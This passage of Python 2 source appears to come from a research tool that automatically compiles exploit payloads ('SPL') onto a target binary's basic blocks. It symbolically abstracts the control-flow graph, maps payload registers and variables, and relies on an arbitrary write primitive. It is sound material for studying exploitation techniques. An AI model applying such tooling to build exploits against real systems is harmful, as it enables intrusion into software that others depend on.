======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n   \n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor. Simply initialize variables that are required for the CFG\n    #       marking process.\n    #\n    # \n    # :Arg project: Instance of angr project\n    # :Arg cfg: Program's CFG\n    # :Arg ir: Compiled IR of the SPL payload\n    # :Arg avoid: Any functions that should be avoided during the marking process\n    #\n    def __init__( self, project, cfg, ir, avoid=[] ):\n        self.__proj  = project                      # save arguments to internal variables\n        self.__cfg   = cfg\n        self.__ir    = ir\n        self.__avoid = avoid\n\n\n        self.vartab = { }                           # variable table\n        self.varmap = { }                           # candidate addresses for variables        \n\n        self.__m  = { }                             # index basic blocks by their entry points\n\n\n        # Mapping Optimization\n        self.__unique_derefs = { }                  # unique dereferences\n        self.__regex = { }\n        for reg in HARDWARE_REGISTERS:              # boost regex computations\n            self.__regex[reg] = re.compile(r'%s_[0-9]+_64' % reg)\n\n\n        self.__rg = nx.Graph()\n\n        self.__rg.add_nodes_from(['__r%d' % i for i in range(8)], bipartite=0)      \n        self.__rg.add_nodes_from(HARDWARE_REGISTERS, bipartite=1)\n\n        # create a mapping between basic blocks (nodes) and their entry points (addresses)\n        for node, _ in self.__cfg.graph.node.iteritems():\n            self.__m[ node.addr ] = node\n\n\n\n    # 
--------------------------------------------------------------------------------------------- \n    # abstract_cfg(): Iterate over CFG and \"abstract\" its basic blocks.\n    #\n    # :Ret: None. Any operations are directly applied to the CFG.\n    #\n    def abstract_cfg( self ):\n        dbg_prnt(DBG_LVL_1, \"Basic block abstraction process started.\")\n\n        nnodes    = self.__blk_cnt(self.__avoid)    # total number of nodes\n        counter   = 1\n        completed = 0\n\n\n        # for each basic block in cfg\n        for addr in self.__blk_iter(self.__avoid, 'block'):  \n            dbg_prnt(DBG_LVL_3, \"Abstracting block at 0x%x (%d/%d)...\" % (addr, counter, nnodes))\n\n            try:\n                # apply abstraction to the basic block that starts at \"addr\"\n                abstr = A.abstract_ng(self.__proj, addr)\n\n                # print 'ADDR', hex(addr)\n                # for a,b in abstr:\n                #     print '\\t', a, b\n                # \n                # exit()\n\n\n                # Abstraction is a process that needs to be done only once. \n                # Cache all abstractions, to avoid recalculating them later on.\n                self.__cfg.graph.add_node(ADDR2NODE[addr], abstr={n:a for n,a in abstr})\n\n                del abstr                           # release object to save memory\n\n            except Exception, err:\n                warn(\"Symbolic Execution at block 0x%x failed: '%s' Much sad :( \"\n                     \"Skipping current block...\" % (addr, str(err)))\n\n                # because we don't know what's going on in this block, we simply discard it\n                self.__cfg.graph.add_node(ADDR2NODE[addr], fail=1)\n\n            counter += 1\n\n\n            # show current progress (%)\n            percent = math.floor(100. 
/ nnodes * counter)\n            if completed < percent:\n                completed = percent            \n                dbg_prnt(DBG_LVL_2, \"%d%% completed\" % completed)\n\n        dbg_prnt(DBG_LVL_1, \"Done.\")\n\n\n\n    # --------------------------------------------------------------------------------------------- \n    # save_abstractions(): Doing a symbolic execution on every basic block in the CFG is a very\n    #       time-consuming operation. The abstraction process is independent of the SPL program, so\n    #       saving the abstractions can save a lot of time when testing multiple SPL programs on\n    #       the same binary. This function dumps all abstractions into a file.\n    #\n    # :Arg filename: Name of the file\n    # :Ret: If saving was successful, function returns True. Otherwise an error message is \n    #       displayed and function returns False.\n    #\n    def save_abstractions( self, filename ):\n        dbg_prnt(DBG_LVL_1, \"Saving basic block abstractions to a file...\")\n\n        abstr = { }                                 # place abstractions here\n        fail  = set()                               # and failures here\n\n\n        # collect all abstractions\n        for node, attr in nx.get_node_attributes(self.__cfg.graph,'abstr').iteritems(): \n            abstr[node.addr] = attr\n\n        # collect all failures\n        for node, _ in nx.get_node_attributes(self.__cfg.graph,'fail').iteritems(): \n            fail.add(node.addr)\n\n        try:\n            output = open(filename + '.abs', 'wb')  # create the file\n            pickle.dump(abstr, output, 0)           # pickle dictionary using protocol 0.\n            pickle.dump(fail,  output, 0)\n            output.close()\n\n        except IOError, err:                        # error is not fatal, so don't abort program\n            warn(\"Cannot save abstractions: %s\" % str(err))\n            return False\n\n    \n        dbg_prnt(DBG_LVL_1, \"Done.\")\n\n        return 
True                                 # success!\n\n\n        \n    # --------------------------------------------------------------------------------------------- \n    # load_abstractions(): Load abstractions from a file that was created by save_abstractions().\n    #\n    # :Arg filename: Name of the file\n    # :Ret: If loading was successful, function returns True. Otherwise a fatal error is generated.\n    #\n    def load_abstractions( self, filename ):\n        dbg_prnt(DBG_LVL_1, \"Loading basic block abstractions from file...\")\n\n        abstr = { }                                 # place abstractions here\n        fail  = set()                               # and failures here\n\n\n        try:\n            pklfile = open(filename + '.abs', 'rb') # open the file\n            abstr = pickle.load(pklfile)            # load dictionary\n            fail  = pickle.load(pklfile)            # and failures\n\n            # pprint.pprint(abstr)\n            pklfile.close()\n\n        except IOError, err:                        # error is fatal, as we can't proceed\n            fatal(\"Cannot load abstractions: %s\" % str(err))\n            \n\n        # now iterate over nodes and attach the loaded abstractions to the CFG\n        for node, attr in self.__cfg.graph.nodes(data=True):\n            if node.addr in abstr:\n                # dbg_arb(DBG_LVL_3, \"Abstractions for block 0x%x:\" % node.addr, abstr[node.addr])\n                self.__cfg.graph.add_node(ADDR2NODE[node.addr], abstr=abstr[node.addr])\n            \n\n            if node.addr in fail:\n                dbg_prnt(DBG_LVL_3, \"Analysis for block 0x%x failed :(\" % node.addr)\n\n                self.__cfg.graph.add_node(ADDR2NODE[node.addr], fail=1)\n\n\n        dbg_prnt(DBG_LVL_1, \"Done.\")\n\n        return True                                 # success!\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # mark_candidate(): Iterate over 
abstracted basic blocks and identify all candidate ones. A \n    #       basic block is a candidate when it can potentially execute any IR statement(s). However\n    #       at this point we don't know yet whether this block can be really used to execute any\n    #       statements; it only fulfils the requirements.\n    #\n    # :Arg forced_mapping: TODO\n    # :Ret: If marking is possible (i.e., enough candidate blocks), then function returns True. \n    #       Otherwise it returns False. Also any operations are directly applied to the CFG.\n    #\n    def mark_candidate( self, forced_mapping=[] ):\n        dbg_prnt(DBG_LVL_1, \"Searching CFG for candidate basic blocks...\")\n\n\n        # ---------------------------------------------------------------------\n        # Create vartab from 'varset' statements\n        # ---------------------------------------------------------------------\n        dbg_prnt(DBG_LVL_2, \"Creating vartab...\")\n\n        for stmt in [s for s in self.__ir if s['type'] == 'varset']:\n            self.vartab[ stmt['name'] ] = stmt['val']\n\n        dbg_prnt(DBG_LVL_2, \"Done.\")       \n\n\n        nnodes  = self.__blk_cnt(self.__avoid, 'abstract')\n        counter = 1\n        \n\n        # ---------------------------------------------------------------------\n        # Check for forced mappings first\n        # ---------------------------------------------------------------------\n        if forced_mapping:\n            dbg_prnt(DBG_LVL_1, \"Applying forced mapping ...\")\n\n            warn(\"No check is made against arguments! 
%s\" % str(forced_mapping))\n\n\n            # self.__rg is empty\n            for vr, hw in forced_mapping:\n                # TODO: check if vr is in the form __r[0-7]\n\n                if not re.search(r'^__r.*', vr):    # check registers only\n                    continue\n\n                # make node immutable\n                nx.set_node_attributes(self.__rg, 'immutable', {vr:1})        \n                self.__rg.add_edge(vr, hw, var=set())\n\n\n        # ---------------------------------------------------------------------\n        # iterate over abstracted basic blocks\n        for node, abstr in self.__blk_iter(self.__avoid, 'abstract'):  \n            addr = node.addr\n\n            dbg_prnt(DBG_LVL_3, \"Analyzing block at 0x%x (%d/%d)...\" % (addr, counter, nnodes))\n\n            cand = []                               # set of statements for that block\n\n            for stmt in self.__ir:                  # check for which statements the block is a candidate\n                match = []\n\n                # -----------------------------------------------------------------------\n                # Statement 'varset'\n                #\n                # Variable assignments do not require candidate blocks. 
Instead\n                # we leverage the AWP, to store variables anywhere in the\n                # memory.\n                #\n                # {'type': 'varset', 'uid': 6, 'val': ['a1'], 'name': 'test'}\n                # {'type': 'varset', 'uid': 8, 'val': ['\\xeb\\x17\\x00\\x00\\x00\\x00\\x00\\x00'], \n                #                   'name': 'foo'}\n                # {'type': 'varset', 'uid': 10, 'val': ['\\xd2\\x04\\x00\\x00\\x00\\x00\\x00\\x00', \n                #           ('foo',), ('test',)], 'name': 'bar'}\n                # -----------------------------------------------------------------------\n        \n\n                # -----------------------------------------------------------------------\n                # Statement 'regset'\n                #\n                # {'reg': 0, 'type': 'regset', 'valty': 'num', 'val': -10, 'uid': 2}\n                # {'reg': 6, 'type': 'regset', 'valty': 'var', 'val': ('bar',), 'uid': 12}\n                # -----------------------------------------------------------------------\n                if stmt['type'] == 'regset' and not isinstance(stmt['val'], tuple):\n                    \n                    for reg, data in abstr['regwr'].iteritems():\n                     #   print '{',  reg, data\n\n                        # apply register filter\n                        if not self.__reg_filter(reg): continue\n\n\n                        if data['type'] == 'concrete' and stmt['val'] == data['const']:\n                            dbg_prnt(DBG_LVL_3, \"Statement match! 
(__r%d) %%%s = 0x%x\" % \n                                                (stmt['reg'], reg, data['const']) )\n\n                            if 'immutable' not in self.__rg.node['__r%d' % stmt['reg']]:\n                                self.__rg.add_edge('__r%d' % stmt['reg'], reg)\n                            \n                            # a candidate block has been found\n                            match.append( {'reg':reg, 'deps':[]} )\n\n\n                        # if there's no concrete value, check for dereferences\n                        elif data['type'] == 'deref' and self.__imm_addr(data['addr'], abstr):\n\n                            dbg_prnt(DBG_LVL_3, \"Statement match! (__r%d) %%%s = [%s]\" % \n                                                (stmt['reg'], reg, data['addr']) )\n\n                            if 'immutable' not in self.__rg.node['__r%d' % stmt['reg']]:\n                                self.__rg.add_edge('__r%d' % stmt['reg'], reg)\n\n                            # a candidate block has been found\n                            match.append( {'reg':reg, 'addr':data['addr'].shallow_repr(), \n                                            'sym':data['sym'],\n                                            'deps':data['deps'], # 'mem':(data['addr'], stmt['val'])                                            \n                                            } )\n\n\n                            for a, b in abstr['symvars'].iteritems():\n                                # SYM2ADDR[a] = b\n\n                                SYM2ADDR[a.shallow_repr()] = b\n                                STR2BV[a.shallow_repr()] = a\n\n                            # Initially, varmap was designed to work with integers as addresses and\n                            # all modules operate under this assumption. 
However, when we store\n                            # bitvectors instead of integers, code starts throwing exceptions.\n                            #\n                            # To fix that, we do a very nasty trick: We store bitvectors as strings\n                            # (so there are no exceptions anymore) and we map those strings to the\n                            # real bitvectors in a global dictionary, so later on we can recover \n                            # the initial bitvectors.\n                            STR2BV[ data['addr'].shallow_repr() ] = data['addr']\n\n\n                            # ok forget about dependencies for now...\n\n                \n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'regset' and isinstance(stmt['val'], tuple):\n\n                    #\n                    for reg, data in abstr['regwr'].iteritems():\n                    #    print '&&',  reg, data\n\n                        # apply register filter\n                        if not self.__reg_filter(reg): continue\n\n\n                        if data['type'] == 'concrete' and data['writable'] == True:\n\n\n                            dbg_prnt(DBG_LVL_3, \"Statement match! (__r%d) %%%s = 0x%x (%s)\" % \n                                                (stmt['reg'], reg, data['const'], stmt['val'][0]))\n\n                            '''\n                            dbg_prnt(DBG_LVL_0, \"Statement match! 
(__r%d) %%%s = 0x%x (%s)\" % \n                                                (stmt['reg'], reg, data['const'], stmt['val'][0]))\n                            print '\\t', 'ADDR', hex(addr)                            \n                            print '\\t', data\n                            print '\\t', abstr['conwr']\n                            print '\\t', abstr['memwr']\n                            print '\\n\\n'\n\n                            # apply abstraction to the basic block that starts at \"addr\"\n                            abstr = A.abstract_ng(self.__proj, 0x403fa2)\n\n                            print '^^^^^^^^^^^^^^^^^^^^^^'\n                            abstr = A.abstract_ng(self.__proj, 0x40400A)\n                            \n                            exit()\n\n                            '''\n\n                            # Abstraction is a process that needs to be done only once. \n                            if not self.__rg.has_edge('__r%d' % stmt['reg'], reg):\n                                var = set()\n                            else:               \n                                # get edge dict (None if there is no edge)\n                                var = self.__rg.get_edge_data('__r%d' % stmt['reg'], reg)\n                                var = var['var']\n\n\n                            # print '============================>', var\n                            var.add( (stmt['val'][0], data['const']) )\n\n\n                            if 'immutable' not in self.__rg.node['__r%d' % stmt['reg']] or\\\n                                self.__rg.has_edge('__r%d' % stmt['reg'], reg):\n                                    self.__rg.add_edge('__r%d' % stmt['reg'], reg, var=var)\n\n                            # a perfect match has been found (with this address)\n                            match.append( {'reg':reg, 'addr':data['const'], 'deps':[]} )\n\n\n                            # use a set because we don't want duplicate addresses\n       
                     self.varmap.setdefault( data['const'], \n                                        set([])).add( (data['const'], reg) )\n\n   \n                        # if there's no concrete value, check for dereferences\n                        elif data['type'] == 'deref' and self.__imm_addr(data['addr'], abstr):\n                            dbg_prnt(DBG_LVL_3, \"Statement match! (__r%d) %%%s = [%s] (%s)\" % \n                                                (stmt['reg'], reg, data['addr'], stmt['val'][0]))\n\n                            # ----------------------------------------------------------- \n                            # Apply an optimization to reduce the large number of derefs.\n                            # Ignore weird addresses that are very unlikely to give a\n                            # solution. Yes, we may miss some solutions, but the\n                            # probability is very small.\n                            # -----------------------------------------------------------\n                            blacklist = ['SignExt', 'symbolic_read_unconstrained', 'Reverse', 'stack_']\n                            skip = False\n\n                            for word in blacklist:\n                                if word in data['addr'].shallow_repr():\n                                    skip = True\n                                    dbg_prnt(DBG_LVL_3, \"blacklisted address '%s'\" % \n                                                            data['addr'].shallow_repr())\n                                    break\n\n\n                            # Initially, varmap was designed to work with integers as addresses and\n                            # all modules operate under this assumption. 
However, when we store\n                            # bitvectors instead of integers, code starts throwing exceptions.\n                            #\n                            # To fix that, we do a very nasty trick: We store bitvectors as strings\n                            # (so there are no exceptions anymore) and we map those strings to the\n                            # real bitvectors in a global dictionary, so later on we can recover\n                            # the initial bitvectors.\n                            if not skip:\n                                STR2BV[ data['addr'].shallow_repr() ] = data['addr']\n\n                                # here we have a double pointer...\n                                addrstr = '*' + data['addr'].shallow_repr()\n\n\n                                if not self.__rg.has_edge('__r%d' % stmt['reg'], reg):\n                                    var = set()\n                                else:               \n                                    # get edge dict (if no edge dict = None)\n                                    var = self.__rg.get_edge_data('__r%d' % stmt['reg'], reg)\n\n                                    # var['var'] can be empty on regmod\n                                    var = var['var'] if 'var' in var else set()\n\n\n                                # -------------------------------------------------------\n                                # Optimization #2:\n                                #\n                                # The same variables can have mappings to many different addresses\n                                # that are essentially the same. 
For example:\n                                #   argv <-> '*<BV64 rsi_22784_64>' \n                                #            '*<BV64 rsi_41354_64>' \n                                #            '*<BV64 rsi_29142_64>'\n                                #\n                                # IN a\n                                # -------------------------------------------------------\n                                sym = data['sym']\n\n                                addrstr, sym = self.__mk_unique(addrstr, data['sym'])\n\n\n                                # store addrstr as a tuple to distinguish it from variables\n                                # print '============================>', var\n                                var.add( (stmt['val'][0], (addrstr,)) )\n\n\n                                if 'immutable' not in self.__rg.node['__r%d' % stmt['reg']] or\\\n                                    self.__rg.has_edge('__r%d' % stmt['reg'], reg):\n                                        self.__rg.add_edge('__r%d' % stmt['reg'], reg, var=var)\n\n\n                                # a match has been found (with this address)\n                                match.append( {'reg':reg, 'addr':addrstr, 'deps':data['deps'], \n                                                'sym':sym\n                                                # 'mem':(data['addr'], stmt['val'])\n                                                } )\n\n                                for a, b in abstr['symvars'].iteritems():\n                                    SYM2ADDR[a.shallow_repr()] = b\n\n                                    STR2BV  [a.shallow_repr()] = a\n\n\n                                # use a set because we don't want duplicate addresses\n                                self.varmap.setdefault(addrstr, set([])).add( (addrstr, reg) )\n\n\n                # -----------------------------------------------------------------------\n                # Statement 'regmod'\n                #\n              
  # {'uid': 18, 'type': 'regmod', 'reg': 6, 'op': '+', 'val': 17712}\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'regmod':\n\n                    for reg, data in abstr['regwr'].iteritems():\n                     #   print '{',  reg, data\n\n                        # apply register filter\n                        if not self.__reg_filter(reg): continue\n\n                        if data['type'] == 'mod' and data['op'] == stmt['op'] and \\\n                           data['const'] == stmt['val']:\n\n                                # match!\n                                dbg_prnt(DBG_LVL_3, \"Statement match! (__r%d) %%%s %s= 0x%x\" % \n                                                (stmt['reg'], reg, data['op'], data['const']))\n                                               \n\n                                if 'immutable' not in self.__rg.node['__r%d' % stmt['reg']]:\n                                    self.__rg.add_edge('__r%d' % stmt['reg'], reg)\n\n                                match.append( reg ) # a perfect match has been found\n\n\n                # -----------------------------------------------------------------------\n                # Statement 'memrd'\n                #\n                #  {'mem': 0, 'type': 'memrd', 'uid': 6, 'reg': 1}\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'memrd':\n                \n                    for reg, data in abstr['regwr'].iteritems():\n\n                        # apply register filter\n                        if not self.__reg_filter(reg): continue\n\n                        # TODO: data['memrd'] == MEMORY_LOADSTORE_SIZE\n                        if data['type'] == 'deref' and data['memrd']:\n\n                            loadreg = data['deps'][0]\n\n                            # match!\n                            dbg_prnt(DBG_LVL_3, \"Statement 
match! (__r%d) %%%s = *(__r%d) %%%s\" % \n                                            (stmt['reg'], reg, stmt['mem'], loadreg))\n                                  \n\n                            if 'immutable' not in self.__rg.node['__r%d' % stmt['reg']] and \\\n                               'immutable' not in self.__rg.node['__r%d' % stmt['mem']]:\n                                    self.__rg.add_edge('__r%d' % stmt['reg'], reg)\n                                    self.__rg.add_edge('__r%d' % stmt['mem'], loadreg)\n\n\n                            # a perfect match has been found\n                            match.append( (reg, loadreg) )\n        \n\n                # -----------------------------------------------------------------------\n                # Statement 'memwr'\n                #\n                # {'uid': 6, 'type': 'memwr', 'mem': 2, 'val': 1}\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'memwr':\n                    \n                    for memwr in abstr['splmemwr']:\n                        # print 'MEMWR', memwr\n\n                        # apply register filters\n                        if not self.__reg_filter(memwr['mem']) or \\\n                           not self.__reg_filter(memwr['val']):\n                                continue\n\n\n                        # TODO: memwr['size'] == MEMORY_LOADSTORE_SIZE\n                    \n                        # match!\n                        dbg_prnt(DBG_LVL_3, \"Statement match! 
*(__r%d) %%%s = (__r%d) %%%s\" % \n                                        (stmt['mem'], memwr['mem'], stmt['val'], memwr['val']))\n                              \n\n                        if 'immutable' not in self.__rg.node['__r%d' % stmt['mem']] and \\\n                           'immutable' not in self.__rg.node['__r%d' % stmt['val']]:\n                                self.__rg.add_edge('__r%d' % stmt['mem'], memwr['mem'])\n                                self.__rg.add_edge('__r%d' % stmt['val'], memwr['val'])\n\n\n                        # a perfect match has been found\n                        match.append( (memwr['mem'], memwr['val']) )\n        \n\n                # -----------------------------------------------------------------------\n                # Statement 'call'\n                #\n                # {'uid': 22, 'type': 'call', 'name': 'puts', 'args': [0], 'dirty': ['rax']}\n                #\n                # TODO: Comment is from old SPL\n                #\n                # For SYSCALL and LIBCALL statements, we only care about the name: if the name\n                # matches the one in the IL statement, then we have a match. We assume that\n                # library calls follow the standard calling conventions and all of their\n                # arguments are passed in registers. Therefore, both syscalls and libcalls\n                # use fixed native registers, whose values we can take from\n                # REGSET/REGMOD statements.\n                #\n                # However, how do we check if the arguments have the desired value? 
Consider\n                # for example the following basic block:\n                #       ...\n                #       mov  rdi, 7\n                #       call exit\n                #\n                # Also assume that we have the following SPL statement:\n                #       __r0 = 5;\n                #       exit( __r0 );\n                #\n                # In this case, this basic block cannot be used for this system call, as the\n                # argument (7) is different from the desired one (5). However, this basic block\n                # is marked as good for the 2nd statement and as bad for the 1st. Thus, we can't\n                # really use this block for the call, as it destroys the 1st statement.\n                #\n                # Thus, all we have to do is match the call name and let the route-building\n                # algorithm decide whether this block can actually be used for the call.\n                # This small demonstration shows how different parts of the algorithm\n                # integrate with each other, giving us an elegant design :)\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'call':\n\n                    # WARNING: ab.funcall() returns the name of the function. If the binary is not\n                    # stripped, ab.funcall() also returns names of user-defined functions. Thus,\n                    # we may have some confusion between library function names and user-defined\n                    # functions.\n                    if abstr['call'] and abstr['call']['name'] == stmt['name']:\n                        dbg_prnt(DBG_LVL_3, \"%s match! %s()\" % (abstr['call']['type'], stmt['name']))\n\n                        match = [ stmt['name'] ]    # make it a list for mark_accepted()\n                        \n\n\n                        # A call reveals a register mapping. 
For example, the only way to\n                        # execute the SPL statement \"puts(__r2)\" is by mapping __r2 to rdi.\n                        # \n                        # So we go back to the register graph (__rg) and we drop all unnecessary\n                        # edges from it (otherwise we would try mappings that cannot give a\n                        # solution).\n                        #\n                        # To prevent future candidate blocks from adding new mappings for that\n                        # register, we mark the register node in __rg as 'immutable', so no new\n                        # edges can be added.\n                        #\n                        \n                        # Calling conventions:\n                        #       System V AMD64 ABI: rdi, rsi, rdx, rcx, r8, r9\n                        #       x64 Syscall       : rdi, rsi, rdx, r10, r8, r9\n\n                        # get calling convention (syscalls use r10 instead of rcx)\n                        if find_syscall(stmt['name']):\n                            rsv = ['rdi', 'rsi', 'rdx', 'r10', 'r8', 'r9']\n                        else:\n                            rsv = ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9']\n\n                        for hw, vr in zip(rsv, stmt['args']):\n                            \n                            # make node immutable\n                            nx.set_node_attributes(self.__rg, 'immutable', {'__r%d' % vr:1})\n\n                            # drop all edges but the one used by the calling convention\n                            for reg in self.__rg.neighbors('__r%d' % vr):\n                                if reg != hw:\n                                    self.__rg.remove_edge('__r%d' % vr, reg)\n\n                        \n                            # if there's no edge, add it\n                            if not self.__rg.has_edge('__r%d' % vr, hw):\n                                self.__rg.add_edge('__r%d' % vr, hw, 
var=set())\n\n                            # a perfect match has been found (with this address)\n\n\n                # -----------------------------------------------------------------------\n                # Statement 'cond'\n                #\n                # {'uid':30, 'type':'cond', 'reg':0, 'op':'>=', 'num':'0x3243', 'target':'@__26'}\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'cond':\n                    # print abstr['cond']\n                    try:\n                        if abstr['cond'] and abstr['cond']['op'] == stmt['op'] and \\\n                            abstr['cond']['const'] == stmt['num']:\n\n                                # apply register filter\n                                if self.__reg_filter(abstr['cond']['reg']):\n\n                                    dbg_prnt(DBG_LVL_3, \"Conditional jump match! (__r%d) %%%s\" % \n                                                        (stmt['reg'], abstr['cond']['reg']))\n\n                                    # make it a list\n                                    match = [ abstr['cond']['reg'] ]\n\n                    except KeyError:\n                        pass\n                \n                # -----------------------------------------------------------------------\n                # Statement 'jump' or 'return'\n                #\n                # Just ignore them\n                # -----------------------------------------------------------------------\n                else: \n                    pass\n\n                if len(match) > 0:                  # if the statement was good, add it to the good set\n                    cand.append( (stmt['uid'], match) )\n        \n\n            if len(cand) > 0:                       # if the block is good for at least 1 statement\n                dbg_arb(DBG_LVL_3, \"Block 0x%x is candidate when:\" % addr, cand )\n\n                # add \"cand\" attribute to that block 
(node)\n                self.__cfg.graph.add_node(self.__m[addr], cand=cand)\n\n\n            counter += 1\n\n          #  break          \n\n\n        # ---------------------------------------------------------------------\n        # Check for forced variable mappings last\n        # ---------------------------------------------------------------------\n        if forced_mapping:\n            dbg_prnt(DBG_LVL_1, \"Applying forced (variable) mapping ...\")\n\n            warn(\"No check is made against arguments! %s\" % str(forced_mapping))\n\n            # self.__rg is empty\n            for fvar, fval in forced_mapping:\n                # TODO: check if vr is in the form __r[0-7]\n                if re.search(r'^__r.*', fvar):       # check variables only\n                    continue\n\n                \n                # iterate over edges\n                for _, _, Vg in self.__rg.edges(data=True):                        \n                    if 'var' not in Vg:\n                        continue        \n\n                    for var, val in set(Vg['var']):\n                        # print var, fvar, val, fval\n                        if var == fvar:\n                            if isinstance(val, tuple) and val[0] != fval:\n                                Vg['var'].remove( (var, val) )\n\n                            elif isinstance(val, long) and str(val) != fval:                                \n                                Vg['var'].remove( (var, val) )\n\n\n\n        # -------------------------------------------------------------------------------\n        # check if you have a sufficient number of candidate blocks\n        # -------------------------------------------------------------------------------\n        print '%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%', len(self.__ir)\n        # for i,j in self.__rg.edge.iteritems(): print i, j\n\n        cnt = set()\n\n        for n, c in nx.get_node_attributes(self.__cfg.graph,'cand').iteritems(): \n            # 
print '0x%x' % n.addr, c\n\n            for a, _ in c:\n                cnt.add( a )\n\n\n        if len(cnt) < self.__ir.nreal:\n            print len(cnt), cnt \n            print self.__ir.nreal\n            error(\"Not enough candidate blocks\")\n            return False\n\n\n\n        # print self.vartab\n        # print self.varmap\n        # for i,j in self.varmap.iteritems():\n        #       print i, [(hex(j), k) for j, k in j]\n\n        self.map_graph = self.__rg\n        \n        # for edge in self.map_graph.edges(data=True):\n        #     print edge\n\n        # for node in self.map_graph.nodes(data=True):\n        #     print node\n\n        # print self.__rg.edges()\n\n        # print variable mappings \n        for u, v, w in self.__rg.edges(data=True):\n            if 'var' not in w:\n                continue\n\n            dbg_prnt(DBG_LVL_3, 'Variable mappings for register mapping %s <-> %s' % (u,v))\n            for ctr, (var, val) in enumerate(w['var']):\n                dbg_prnt(DBG_LVL_3, \"\\t#%03d '%s' <-> '%s'\" % (ctr, var, val))\n\n        return True\n\n\n\n    # --------------------------------------------------------------------------------------------- \n    # mark_accepted(): Given a register and a variable mapping, this function identifies the\n    #       subset of candidate basic blocks that can be truly used to execute SPL statements\n    #       (i.e., accepted basic blocks).\n    #\n    # :Arg rmap: A list of (virtual register, hardware register) mappings\n    # :Arg vmap: A list of (variable, address) mappings\n    # :Ret: If there are enough accepted blocks, function returns a tuple with:\n    #       1) a dictionary that has a list of all accepted basic blocks for each \"real\" statement. \n    #       2) rsvp. 
TODO: Fill in.\n    #\n    # Otherwise, function returns None.\n    #\n    def mark_accepted( self, rmap, vmap ):\n        dbg_prnt(DBG_LVL_1, \"Searching for accepted basic blocks...\")\n\n        # clear potential leftovers from previous attempts\n        for node, _ in nx.get_node_attributes(self.__cfg.graph,'acc').items(): \n            del self.__cfg.graph.node[node]['acc']\n\n\n        rmap = { vr:hw    for vr,hw    in rmap }    # cast them to dictionaries to ease searching\n        vmap = { var:addr for var,addr in vmap }\n\n        cnt = set()\n    \n\n        accepted = { }                              # dictionary of lists\n        rsvp = { }                                  # reserved memory slots\n        \n\n        # iterate over candidate basic blocks\n        #\n        # <CFGNode main+0xff 0x4007e6L[24]> [(4, ['rax']), (3, [('rsi', 576460752303358064L)])]\n        for node, attr in nx.get_node_attributes(self.__cfg.graph,'cand').iteritems(): \n            # dbg_prnt(DBG_LVL_3, \"Analyzing candidate block at 0x%x...\" % node.addr)\n       \n\n            acc = []\n\n            for stmt, cand in [(self.__ir[uid], c) for (uid, cand) in attr for c in cand]:\n\n                # \"varset\", \"label\", \"jump\" and \"return\" are not real statements and therefore\n                # they do not require an accepted block.\n\n                # print '--->', cand, stmt, attr\n\n                # -----------------------------------------------------------------------\n                # Statement 'regset'\n                #\n                # Examples of 'cand':\n                #   {'reg': 'rax', 'deps': ['rsi'], 'addr': '<BV64 rsi_674_64>'},\n                #   {'reg': 'rsp', 'deps': [], 'addr': 576460752303357928L}]\n                #   {'reg': 'rax', 'deps': []}\n                # -----------------------------------------------------------------------\n                if stmt['type'] == 'regset':\n                    isok = False\n\n\n                    
# check if register matches\n                    if rmap[ '__r%d' % stmt['reg'] ] == cand['reg']:\n                        # case #1: rax = 10\n                        if 'addr' not in cand:\n                            # block is accepted\n                            acc.append( stmt['uid'] )\n                            isok = True\n\n\n                        # case #2: rax = 0x7fffffffffeffe8\n                        elif isinstance(cand['addr'], long):\n                            if vmap[ stmt['val'][0] ] == cand['addr']:\n                                acc.append( stmt['uid'] )\n                                isok = True\n\n\n                        # case #3: rax = [rsi + 0x10], *(rsi + 0x10) = 10\n                        # case #4: rax = [rsi + 0x10], *(rsi + 0x10) = 0x7fffffffffeffe8                        \n                        elif isinstance(cand['addr'], str):\n                            acc.append( stmt['uid'] )\n                            isok = True\n\n                            rsvp.setdefault(node.addr, []).append( \n                                (stmt['uid'], cand['addr'], cand['sym'], stmt['val']) \n                            )\n\n                        # print '   $ $ $ $ $ $ $ $ RSVP:   ', rsvp[node.addr]\n\n\n                    # TODO: make dependencies time-sensitive &  explain why it doesn't work\n                    if isok and cand['deps']:      # are there dependencies?\n                        pass\n                        # make sure that dependencies are not reserved registers\n                        if filter(lambda reg: reg in cand['deps'], rmap.values()):\n                            pass\n \n                            # this block uses a reserved register. 
  It cannot be accepted for that\n                            # statement\n\n\n                # -----------------------------------------------------------------------\n                # Statement 'regmod'\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'regmod':\n                    if rmap['__r%d' % stmt['reg']] == cand:\n                        acc.append( stmt['uid'] )\n\n\n                # -----------------------------------------------------------------------\n                # Statement 'memrd'\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'memrd':                                      \n                    if (rmap['__r%d' % stmt['reg']], rmap['__r%d' % stmt['mem']]) == cand:\n                        acc.append( stmt['uid'] )\n\n                \n                # -----------------------------------------------------------------------\n                # Statement 'memwr'\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'memwr':\n                    if (rmap['__r%d' % stmt['mem']], rmap['__r%d' % stmt['val']]) == cand:\n                        acc.append( stmt['uid'] )\n\n                           \n                # -------------------------------------------------------------------------                     \n                # Statement 'call'\n                #\n                # Here, we make all 'call' candidate blocks accepted and we let the\n                # regset/regmod statements handle the clobbering\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'call':\n                    acc.append( stmt['uid'] )\n\n\n                # -----------------------------------------------------------------------\n                # Statement 
